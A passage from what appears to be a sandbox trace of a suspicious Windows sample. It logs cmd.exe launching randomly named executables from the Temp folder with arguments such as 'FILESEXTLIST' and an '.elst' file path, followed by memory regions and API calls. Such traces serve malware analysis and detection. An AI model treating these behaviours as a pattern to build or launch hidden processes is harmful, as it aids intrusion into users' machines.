_wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0115.279] 
_wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0115.279] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0115.279] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0115.279] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0115.280] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0115.280] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0115.280] _wcsicmp (_String1="\"C", _String2="SHIFT") 
returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0115.280] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0115.280] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0115.280] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0115.280] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0115.280] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0115.280] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0115.280] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0115.280] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0115.281] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0115.281] SetErrorMode (uMode=0x0) returned 0x0 [0115.281] SetErrorMode (uMode=0x1) returned 0x0 [0115.281] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x904c0, lpFilePart=0x2aee04 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x2aee04*="Temp") returned 
0x23 [0115.281] SetErrorMode (uMode=0x0) returned 0x1 [0115.281] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0115.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.285] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x1, lpFindFileData=0x2aeba0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeba0) returned 0x80f68 [0115.285] FindClose (in: hFindFile=0x80f68 | out: hFindFile=0x80f68) returned 1 [0115.285] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0115.285] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0115.285] GetConsoleTitleW (in: lpConsoleTitle=0x2af078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.285] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aefc8 | out: lpAttributeList=0x2aef00, lpSize=0x2aefc8) returned 1 [0115.285] UpdateProcThreadAttribute (in: lpAttributeList=0x2aef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aefc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aef00, lpPreviousValue=0x0) returned 1 [0115.285] GetStartupInfoW (in: lpStartupInfo=0x2aeebc | out: lpStartupInfo=0x2aeebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", 
_MaxCount=0x7) returned 2 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 
[0115.286] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0115.287] lstrcmpW (lpString1="\\w588H5dN.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.288] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aefa8 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x2aefa8*(hProcess=0x50, 
hThread=0x4c, dwProcessId=0xe10, dwThreadId=0xe14)) returned 1 [0115.645] CloseHandle (hObject=0x4c) returned 1 [0115.645] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.645] GetEnvironmentStringsW () returned 0x92cf8* [0115.645] FreeEnvironmentStringsW (penv=0x92cf8) returned 1 [0115.645] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0117.138] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee9c | out: lpExitCode=0x2aee9c*=0x0) returned 1 [0117.138] CloseHandle (hObject=0x50) returned 1 [0117.139] _vsnwprintf (in: _Buffer=0x2aefe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aeea8 | out: _Buffer="00000000") returned 8 [0117.139] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.139] GetEnvironmentStringsW () returned 0x92480* [0117.139] FreeEnvironmentStringsW (penv=0x92480) returned 1 [0117.139] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.139] GetEnvironmentStringsW () returned 0x92480* [0117.139] FreeEnvironmentStringsW (penv=0x92480) returned 1 [0117.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aef00 | out: lpAttributeList=0x2aef00) [0117.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.139] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.139] SetConsoleInputExeNameW () returned 0x1 [0117.140] GetConsoleOutputCP () returned 0x1b5 [0117.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.140] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.140] exit (_Code=0) Process: id = "46" image_name = "gym4nxcu.exe" filename = 
"c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe" page_root = "0x7ea16760" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xd44" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7443 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7444 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7445 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7446 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "gym4nxcu.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe") Region: id = 7447 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7448 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7449 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7450 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7451 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7452 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7453 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7454 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7455 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 7456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7459 start_va = 0x76a90000 end_va = 0x76b3bfff 
entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7464 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 7465 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7480 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7481 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 7482 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000150000" filename = "" Region: id = 7483 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7484 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 7766 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7767 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7772 start_va = 0x11d0000 end_va = 0x12aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 7773 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7774 start_va = 0x160000 end_va = 0x162fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 7775 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Thread: id = 75 os_tid = 0xdb4 [0113.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x816de2a0, dwHighDateTime=0x1d440a9)) [0113.113] GetCurrentProcessId () returned 0xdb0 [0113.113] GetCurrentThreadId () returned 0xdb4 [0113.113] GetTickCount () returned 0x27177 [0113.113] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16990193395) returned 1 [0113.113] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", 
lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0113.113] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0113.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.120] GetCurrentThreadId () returned 0xdb4 [0113.120] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x1507d0)) [0113.120] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0113.120] GetFileType (hFile=0x3) returned 0x0 [0113.120] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0113.120] GetFileType (hFile=0x7) returned 0x0 [0113.120] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.120] GetFileType (hFile=0xb) returned 0x0 [0113.120] SetHandleCount (uNumber=0x20) returned 0x20 [0113.120] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0113.120] GetEnvironmentStringsW () returned 0x18fe18* [0113.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0113.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x1511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0113.120] FreeEnvironmentStringsW (penv=0x18fe18) returned 1 [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetACP () returned 0x4e4 [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.121] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0113.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, 
lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.121] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, 